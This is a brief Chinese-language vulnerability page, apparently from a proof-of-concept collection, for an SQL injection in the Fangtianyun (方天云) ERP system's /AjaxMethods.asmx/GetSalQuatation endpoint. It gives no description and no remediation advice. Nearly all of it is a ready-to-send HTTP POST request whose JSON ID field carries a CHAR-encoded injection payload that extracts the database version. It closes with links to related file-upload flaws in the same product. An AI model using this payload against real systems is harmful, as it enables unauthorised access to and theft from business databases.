方天云ERP系统 /AjaxMethods.asmx/GetSalQuatation SQL 注入漏洞

漏洞描述

PoC代码

POST /AjaxMethods.asmx/GetSalQuatation HTTPS/1.1
Host: 
Content-Type: application/json

{ID:"(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(CASE WHEN (8725=8725) THEN @@VERSION ELSE CHAR(48) END)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(106)+CHAR(113))"}

相关漏洞推荐

• 方天云ERP系统 /Upload.ashx 文件上传漏洞
• 方天云ERP系统 setImg 任意文件上传漏洞
• 方天云智慧平台系统/AjaxMethods.asmx/GetSalQuatation接口存在SQL注入
• 方天云ERP系统Upload存在任意文件上传漏洞